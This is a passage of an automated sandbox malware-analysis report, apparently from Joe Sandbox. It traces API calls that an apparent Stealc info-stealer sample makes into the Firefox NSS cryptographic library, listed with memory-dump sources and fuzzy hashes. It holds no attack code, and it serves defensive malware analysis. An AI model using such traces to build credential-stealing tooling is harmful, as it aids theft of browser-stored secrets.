                                                                                                                                                                            • memcpy.VCRUNTIME140(00000000,?,?), ref: 6C88EEEB
                                                                                                                                                                            • free.MOZGLUE(?), ref: 6C88EEF6
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ErrorValuecallocfreememcpy
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3833505462-0
                                                                                                                                                                            • Opcode ID: 2ca90ef857debaf02f80526475d437d5570a818d9006134c54e7d2e23f55200b
                                                                                                                                                                            • Instruction ID: f56db6dca8b92d16d8b412987cd21737ea28f34d5140c7ebb4deb4a1b3f847a3
                                                                                                                                                                            • Opcode Fuzzy Hash: 2ca90ef857debaf02f80526475d437d5570a818d9006134c54e7d2e23f55200b
                                                                                                                                                                            • Instruction Fuzzy Hash: 1831F5B56056149BEB309F2CDD44B667BB4FB46304F240928E89A87E51D731E814CBF1
                                                                                                                                                                            APIs
                                                                                                                                                                            • PR_SetError.NSS3(FFFFE002,00000000,?,00000001,?,?,6C8B6295,?,00000000,00000000,00000001,6C8D2653,?), ref: 6C8D1ECB
                                                                                                                                                                              • Part of subcall function 6C93C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C93C2BF
                                                                                                                                                                            • TlsGetValue.KERNEL32(?,00000001,?,?,6C8B6295,?,00000000,00000000,00000001,6C8D2653,?), ref: 6C8D1EF1
                                                                                                                                                                            • EnterCriticalSection.KERNEL32(?), ref: 6C8D1F01
                                                                                                                                                                            • PR_SetError.NSS3(00000000,00000000), ref: 6C8D1F39
                                                                                                                                                                              • Part of subcall function 6C8DFE20: TlsGetValue.KERNEL32(6C8B5ADC,?,00000000,00000001,?,?,00000000,?,6C8ABA55,?,?), ref: 6C8DFE4B
                                                                                                                                                                              • Part of subcall function 6C8DFE20: EnterCriticalSection.KERNEL32(78831D90,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C8DFE5F
                                                                                                                                                                            • PR_Unlock.NSS3(?), ref: 6C8D1F67
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Value$CriticalEnterErrorSection$Unlock
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 704537481-0
                                                                                                                                                                            • Opcode ID: 9b29378026e954e8526c61841dd34724d79c899a997f20e8651fa0773128f067
                                                                                                                                                                            • Instruction ID: 02b24189917268d656a595c904419dfb06dbd9be8f7541234f3ea0cc8e15b75f
                                                                                                                                                                            • Opcode Fuzzy Hash: 9b29378026e954e8526c61841dd34724d79c899a997f20e8651fa0773128f067
                                                                                                                                                                            • Instruction Fuzzy Hash: 33215775A042059BEB20AE29ED40F9A3769EF51378F1A0920FC0887B01EB30F950C7E2
                                                                                                                                                                            APIs
                                                                                                                                                                            • DER_DecodeTimeChoice_Util.NSS3(?,?), ref: 6C891E0B
                                                                                                                                                                            • DER_DecodeTimeChoice_Util.NSS3(?,?), ref: 6C891E24
                                                                                                                                                                            • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C891E3B
                                                                                                                                                                            • PR_SetError.NSS3(FFFFE00B,00000000), ref: 6C891E8A
                                                                                                                                                                            • PR_SetError.NSS3(FFFFE00B,00000000), ref: 6C891EAD
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Error$Choice_DecodeTimeUtil
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1529734605-0
                                                                                                                                                                            • Opcode ID: 3e6375312978a1f7302b2210da2c2c727648e232005698fb2dbc57c1966d9efd
                                                                                                                                                                            • Instruction ID: eb4acbacae803de5a7af1a085a7f3fe209b32b6c75ef63de0bd21ebf295c3027
                                                                                                                                                                            • Opcode Fuzzy Hash: 3e6375312978a1f7302b2210da2c2c727648e232005698fb2dbc57c1966d9efd
                                                                                                                                                                            • Instruction Fuzzy Hash: BD212872E08328A7D7108E6CDD40B8F73989B94369F144A38ED5D57780E730D90987E2
                                                                                                                                                                            APIs
                                                                                                                                                                            • PORT_ArenaMark_Util.NSS3(00000000,?,6C893FFF,00000000,?,?,?,?,?,6C891A1C,00000000,00000000), ref: 6C89ADA7
                                                                                                                                                                              • Part of subcall function 6C8F14C0: TlsGetValue.KERNEL32 ref: 6C8F14E0
                                                                                                                                                                              • Part of subcall function 6C8F14C0: EnterCriticalSection.KERNEL32 ref: 6C8F14F5
                                                                                                                                                                              • Part of subcall function 6C8F14C0: PR_Unlock.NSS3 ref: 6C8F150D
                                                                                                                                                                            • PORT_ArenaAlloc_Util.NSS3(00000000,00000020,?,?,6C893FFF,00000000,?,?,?,?,?,6C891A1C,00000000,00000000), ref: 6C89ADB4
                                                                                                                                                                              • Part of subcall function 6C8F10C0: TlsGetValue.KERNEL32(?,6C898802,00000000,00000008,?,6C88EF74,00000000), ref: 6C8F10F3
                                                                                                                                                                              • Part of subcall function 6C8F10C0: EnterCriticalSection.KERNEL32(?,?,6C898802,00000000,00000008,?,6C88EF74,00000000), ref: 6C8F110C
                                                                                                                                                                              • Part of subcall function 6C8F10C0: PL_ArenaAllocate.NSS3(?,?,?,6C898802,00000000,00000008,?,6C88EF74,00000000), ref: 6C8F1141
                                                                                                                                                                              • Part of subcall function 6C8F10C0: PR_Unlock.NSS3(?,?,?,6C898802,00000000,00000008,?,6C88EF74,00000000), ref: 6C8F1182
                                                                                                                                                                              • Part of subcall function 6C8F10C0: TlsGetValue.KERNEL32(?,6C898802,00000000,00000008,?,6C88EF74,00000000), ref: 6C8F119C
                                                                                                                                                                            • SECITEM_CopyItem_Util.NSS3(00000000,?,6C893FFF,?,?,?,?,6C893FFF,00000000,?,?,?,?,?,6C891A1C,00000000), ref: 6C89ADD5
                                                                                                                                                                              • Part of subcall function 6C8EFB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6C8E8D2D,?,00000000,?), ref: 6C8EFB85
                                                                                                                                                                              • Part of subcall function 6C8EFB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6C8EFBB1
                                                                                                                                                                            • SEC_QuickDERDecodeItem_Util.NSS3(00000000,00000000,6C9B94B0,?,?,?,?,?,?,?,?,6C893FFF,00000000,?), ref: 6C89ADEC
                                                                                                                                                                              • Part of subcall function 6C8EB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C9C18D0,?), ref: 6C8EB095
                                                                                                                                                                            • PR_SetError.NSS3(FFFFE022,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,6C893FFF), ref: 6C89AE3C
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Util$Arena$Value$Alloc_CriticalEnterErrorItem_SectionUnlock$AllocateCopyDecodeMark_Quickmemcpy
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2372449006-0
                                                                                                                                                                            • Opcode ID: f99a7ddfe746addf41d98cee02000eda266862e2162c3794b5fdb8ed6a484a8a
                                                                                                                                                                            • Instruction ID: dd6e9bb11548baf037479eccbd56ee2037af5c80446ea0638b88663cb8dc2a34
                                                                                                                                                                            • Opcode Fuzzy Hash: f99a7ddfe746addf41d98cee02000eda266862e2162c3794b5fdb8ed6a484a8a
                                                                                                                                                                            • Instruction Fuzzy Hash: D7113B71E003196BE7209B6D9D40BFF73B8DFA524DF044A38EC1A96741FB21E55982E2
                                                                                                                                                                            APIs
                                                                                                                                                                            • PK11_GetInternalKeySlot.NSS3(?,?,?,6C8D2E62,?,?,?,?,?,?,?,00000000,?,?,?,6C8A4F1C), ref: 6C8B8EA2
                                                                                                                                                                              • Part of subcall function 6C8DF820: free.MOZGLUE(6A1B7500,2404110F,?,?), ref: 6C8DF854
                                                                                                                                                                              • Part of subcall function 6C8DF820: free.MOZGLUE(FFD3F9E8,2404110F,?,?), ref: 6C8DF868
                                                                                                                                                                              • Part of subcall function 6C8DF820: DeleteCriticalSection.KERNEL32(04C4841B,2404110F,?,?), ref: 6C8DF882
                                                                                                                                                                              • Part of subcall function 6C8DF820: free.MOZGLUE(04C483FF,?,?), ref: 6C8DF889
                                                                                                                                                                              • Part of subcall function 6C8DF820: DeleteCriticalSection.KERNEL32(CCCCCCDF,2404110F,?,?), ref: 6C8DF8A4
                                                                                                                                                                              • Part of subcall function 6C8DF820: free.MOZGLUE(CCCCCCC3,?,?), ref: 6C8DF8AB
                                                                                                                                                                              • Part of subcall function 6C8DF820: DeleteCriticalSection.KERNEL32(280F1108,2404110F,?,?), ref: 6C8DF8C9
                                                                                                                                                                              • Part of subcall function 6C8DF820: free.MOZGLUE(280F10EC,?,?), ref: 6C8DF8D0
                                                                                                                                                                            • PK11_IsLoggedIn.NSS3(?,?,?,6C8D2E62,?,?,?,?,?,?,?,00000000,?,?,?,6C8A4F1C), ref: 6C8B8EC3
                                                                                                                                                                            • TlsGetValue.KERNEL32(?,?,?,6C8D2E62,?,?,?,?,?,?,?,00000000,?,?,?,6C8A4F1C), ref: 6C8B8EDC
                                                                                                                                                                            • EnterCriticalSection.KERNEL32(?,?,?,?,6C8D2E62,?,?,?,?,?,?,?,00000000,?,?), ref: 6C8B8EF1
                                                                                                                                                                            • PR_Unlock.NSS3 ref: 6C8B8F20
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: free$CriticalSection$Delete$K11_$EnterInternalLoggedSlotUnlockValue
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1978757487-0
                                                                                                                                                                            • Opcode ID: dff8dde16c04da262562c17d17c2c61a08d84de537761cf119aea9ec8282b884
                                                                                                                                                                            • Instruction ID: 353e117ceb9e9d0a150e6cbccd593907c2f1317793eaf543dcc7a5cd6e546c3d
                                                                                                                                                                            • Opcode Fuzzy Hash: dff8dde16c04da262562c17d17c2c61a08d84de537761cf119aea9ec8282b884
                                                                                                                                                                            • Instruction Fuzzy Hash: B9218D709097069FD710AF29D284199BBF0FF48318F05496EEC98ABB41D730E854CBD2
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 6C8D1E10: TlsGetValue.KERNEL32 ref: 6C8D1E36
                                                                                                                                                                              • Part of subcall function 6C8D1E10: EnterCriticalSection.KERNEL32(?,?,?,6C8AB1EE,2404110F,?,?), ref: 6C8D1E4B
                                                                                                                                                                              • Part of subcall function 6C8D1E10: PR_Unlock.NSS3 ref: 6C8D1E76
                                                                                                                                                                            • free.MOZGLUE(?,6C8BD079,00000000,00000001), ref: 6C8BCDA5
                                                                                                                                                                            • PK11_FreeSymKey.NSS3(?,6C8BD079,00000000,00000001), ref: 6C8BCDB6
                                                                                                                                                                            • SECITEM_ZfreeItem_Util.NSS3(?,00000001,6C8BD079,00000000,00000001), ref: 6C8BCDCF
                                                                                                                                                                            • DeleteCriticalSection.KERNEL32(?,6C8BD079,00000000,00000001), ref: 6C8BCDE2
                                                                                                                                                                            • free.MOZGLUE(?), ref: 6C8BCDE9
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CriticalSectionfree$DeleteEnterFreeItem_K11_UnlockUtilValueZfree
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1720798025-0
                                                                                                                                                                            • Opcode ID: 08878689964513cfbe9f9792303e8059c79189e759ef1994386074fc8e52f51a
                                                                                                                                                                            • Instruction ID: 523b6874fe96a8a48ff456f26931a255540a5edaa2b0a0a6729bb21b218763e1
                                                                                                                                                                            • Opcode Fuzzy Hash: 08878689964513cfbe9f9792303e8059c79189e759ef1994386074fc8e52f51a
                                                                                                                                                                            • Instruction Fuzzy Hash: 781106B6B00111BBDF20AE64ED44996BB3CFF0825A7140931F918A7E02D731F424C7E1
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 6C925B40: PR_GetIdentitiesLayer.NSS3 ref: 6C925B56
                                                                                                                                                                            • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C922CEC
                                                                                                                                                                              • Part of subcall function 6C93C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C93C2BF
                                                                                                                                                                            • PR_EnterMonitor.NSS3(?), ref: 6C922D02
                                                                                                                                                                            • PR_EnterMonitor.NSS3(?), ref: 6C922D1F
                                                                                                                                                                            • PR_ExitMonitor.NSS3(?), ref: 6C922D42
                                                                                                                                                                            • PR_ExitMonitor.NSS3(?), ref: 6C922D5B
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Monitor$EnterExit$ErrorIdentitiesLayerValue
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1593528140-0
                                                                                                                                                                            • Opcode ID: 4ef27760c05e354bdbdc14a9bf5efb7db43890b1c91ebd88415995a73019c396
                                                                                                                                                                            • Instruction ID: 02e17457790405f85a475d24a792c292d57b7781e0bd479cfcefb85f38ab3c35
                                                                                                                                                                            • Opcode Fuzzy Hash: 4ef27760c05e354bdbdc14a9bf5efb7db43890b1c91ebd88415995a73019c396
                                                                                                                                                                            • Instruction Fuzzy Hash: C701E5F19206009BE7309E29FC40BA7B3A5EB61328F000535E89D86710D736E829C792
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 6C925B40: PR_GetIdentitiesLayer.NSS3 ref: 6C925B56
                                                                                                                                                                            • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C922D9C
                                                                                                                                                                              • Part of subcall function 6C93C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C93C2BF
                                                                                                                                                                            • PR_EnterMonitor.NSS3(?), ref: 6C922DB2
                                                                                                                                                                            • PR_EnterMonitor.NSS3(?), ref: 6C922DCF
                                                                                                                                                                            • PR_ExitMonitor.NSS3(?), ref: 6C922DF2
                                                                                                                                                                            • PR_ExitMonitor.NSS3(?), ref: 6C922E0B
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Monitor$EnterExit$ErrorIdentitiesLayerValue
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1593528140-0
                                                                                                                                                                            • Opcode ID: 1e9434b66f5bacf9a806f1db442a6747708187bc64aeee5eb685236fa59530ec
                                                                                                                                                                            • Instruction ID: e949265558694dc42a7f16ad1a1d7ed4c59a49551b0c9664606cd61abcb153cc
                                                                                                                                                                            • Opcode Fuzzy Hash: 1e9434b66f5bacf9a806f1db442a6747708187bc64aeee5eb685236fa59530ec
                                                                                                                                                                            • Instruction Fuzzy Hash: 0F01A5B5920A009BEB309E29FC01BD7B7A5EB61328F400535E89D86B14D736E8258692
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 6C8A3090: PORT_NewArena_Util.NSS3(00000800,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C8BAE42), ref: 6C8A30AA
                                                                                                                                                                              • Part of subcall function 6C8A3090: PORT_ArenaAlloc_Util.NSS3(00000000,000000AC,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C8A30C7
                                                                                                                                                                              • Part of subcall function 6C8A3090: memset.VCRUNTIME140(-00000004,00000000,000000A8), ref: 6C8A30E5
                                                                                                                                                                              • Part of subcall function 6C8A3090: SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C8A3116
                                                                                                                                                                              • Part of subcall function 6C8A3090: SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6C8A312B
                                                                                                                                                                              • Part of subcall function 6C8A3090: PK11_DestroyObject.NSS3(?,?), ref: 6C8A3154
                                                                                                                                                                              • Part of subcall function 6C8A3090: PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C8A317E
                                                                                                                                                                            • SECKEY_DestroyPublicKey.NSS3(00000000,?,00000000,?,6C8999FF,?,?,?,?,?,?,?,?,?,6C892D6B,?), ref: 6C8BAE67
                                                                                                                                                                            • SECITEM_DupItem_Util.NSS3(-00000014,?,00000000,?,6C8999FF,?,?,?,?,?,?,?,?,?,6C892D6B,?), ref: 6C8BAE7E
                                                                                                                                                                            • SECKEY_DestroyPublicKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,6C892D6B,?,?,00000000), ref: 6C8BAE89
                                                                                                                                                                            • PK11_MakeIDFromPubKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,6C892D6B,?,?,00000000), ref: 6C8BAE96
                                                                                                                                                                            • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001,?,?,?,?,?,?,?,?,?,?,?,6C892D6B,?,?), ref: 6C8BAEA3
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Util$DestroyItem_$Arena_K11_Public$AlgorithmAlloc_ArenaCopyFreeFromMakeObjectTag_Zfreememset
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 754562246-0
                                                                                                                                                                            • Opcode ID: d5e51057a05767519fab2ab4e31125e4961539a17dcf617315058b79e36cd001
                                                                                                                                                                            • Instruction ID: 6ea6167814c60ccb25bdc787bb2e7b6e5717001953b1b6922c96effba9441c79
                                                                                                                                                                            • Opcode Fuzzy Hash: d5e51057a05767519fab2ab4e31125e4961539a17dcf617315058b79e36cd001
                                                                                                                                                                            • Instruction Fuzzy Hash: 7301F472B0441457E731916CEE81BEB31588B8765DF080C31F809EBB01F635D90943A3
                                                                                                                                                                            APIs
                                                                                                                                                                            • DeleteCriticalSection.KERNEL32(?,00000000,00000000,?,6C9A7AFE,?,?,?,?,?,?,?,?,6C9A798A), ref: 6C9ABDC3
                                                                                                                                                                            • free.MOZGLUE(?,?,6C9A7AFE,?,?,?,?,?,?,?,?,6C9A798A), ref: 6C9ABDCA
                                                                                                                                                                            • PR_DestroyMonitor.NSS3(?,00000000,00000000,?,6C9A7AFE,?,?,?,?,?,?,?,?,6C9A798A), ref: 6C9ABDE9
                                                                                                                                                                            • free.MOZGLUE(?,00000000,00000000,?,6C9A7AFE,?,?,?,?,?,?,?,?,6C9A798A), ref: 6C9ABE21
                                                                                                                                                                            • free.MOZGLUE(00000000,00000000,?,6C9A7AFE,?,?,?,?,?,?,?,?,6C9A798A), ref: 6C9ABE32
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: free$CriticalDeleteDestroyMonitorSection
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3662805584-0
                                                                                                                                                                            • Opcode ID: a28b07bbd8be6a6b342a3be4ef07cc9e15456154be08f27c57a39a07b5c43543
                                                                                                                                                                            • Instruction ID: 1e3273a31599c34576992007b0fb8abb6558e7889518d35b334da9ac7b3f3904
                                                                                                                                                                            • Opcode Fuzzy Hash: a28b07bbd8be6a6b342a3be4ef07cc9e15456154be08f27c57a39a07b5c43543
